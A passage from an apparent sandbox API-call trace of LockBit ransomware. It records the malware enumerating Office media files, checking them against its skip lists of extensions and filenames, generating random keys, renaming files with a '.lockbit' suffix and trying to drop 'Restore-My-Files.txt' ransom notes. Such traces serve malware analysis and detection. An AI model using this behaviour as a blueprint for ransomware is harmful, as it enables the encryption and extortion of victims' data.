nFileSizeHigh=0x0, nFileSizeLow=0xfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15019_.GIF", cAlternateFileName="")) returned 1 [0203.830] lstrcmpiW (lpString1=".", lpString2="BD15019_.GIF") returned -1 [0203.830] lstrcmpiW (lpString1="..", lpString2="BD15019_.GIF") returned -1 [0203.830] PathFindExtensionW (pszPath="BD15019_.GIF") returned=".GIF" [0203.830] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.830] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.830] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.830] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.830] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.830] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.830] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.831] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.831] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15019_.GIF") returned 1 [0203.832] lstrcmpiW (lpString1="ntldr", lpString2="BD15019_.GIF") returned 1 [0203.832] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15019_.GIF") returned 1 [0203.832] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15019_.GIF") returned 1 [0203.832] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15019_.GIF") returned -1 [0203.832] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15019_.GIF") returned 1 [0203.832] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15019_.GIF") returned 1 [0203.832] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.832] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF") returned=".GIF" [0203.832] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.832] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.832] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.833] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.833] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.833] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF.lockbit") returned 78 [0203.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15019_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.834] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.834] malloc (_Size=0x40068) returned 0x3df0008 [0203.834] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=254) returned 1 [0203.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.835] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.839] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.839] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.839] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.839] free (_Block=0x1fa2ed8) [0203.839] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.839] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.839] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcdc00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x83dcdc00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x63, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15020_.GIF", cAlternateFileName="")) returned 1 [0203.839] lstrcmpiW (lpString1=".", lpString2="BD15020_.GIF") returned -1 [0203.839] lstrcmpiW (lpString1="..", lpString2="BD15020_.GIF") returned -1 [0203.839] PathFindExtensionW (pszPath="BD15020_.GIF") returned=".GIF" [0203.839] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.839] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.839] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.840] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.840] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.840] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.840] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.840] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15020_.GIF") returned 1 [0203.840] lstrcmpiW (lpString1="ntldr", lpString2="BD15020_.GIF") returned 1 [0203.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15020_.GIF") returned 1 [0203.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15020_.GIF") returned 1 [0203.840] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15020_.GIF") returned -1 [0203.840] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15020_.GIF") returned 1 [0203.841] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15020_.GIF") returned 1 [0203.841] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.841] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF") returned=".GIF" [0203.841] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.841] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.841] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.841] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF.lockbit") returned 78 [0203.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15020_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.843] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.843] malloc (_Size=0x40068) returned 0x3df0008 [0203.843] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=99) returned 1 [0203.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.844] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.848] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.848] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.848] free (_Block=0x1fa2ed8) [0203.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.848] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.848] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.848] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82abaf00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x82abaf00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15021_.GIF", cAlternateFileName="")) returned 1 [0203.848] lstrcmpiW (lpString1=".", lpString2="BD15021_.GIF") returned -1 [0203.848] lstrcmpiW (lpString1="..", lpString2="BD15021_.GIF") returned -1 [0203.848] PathFindExtensionW (pszPath="BD15021_.GIF") returned=".GIF" [0203.848] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.848] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.848] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.849] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.849] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15021_.GIF") returned 1 [0203.849] lstrcmpiW (lpString1="ntldr", lpString2="BD15021_.GIF") returned 1 [0203.849] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15021_.GIF") returned 1 [0203.849] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15021_.GIF") returned 1 [0203.850] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15021_.GIF") returned -1 [0203.850] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15021_.GIF") returned 1 [0203.850] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15021_.GIF") returned 1 [0203.850] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.850] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF") returned=".GIF" [0203.850] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.850] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".ndf", 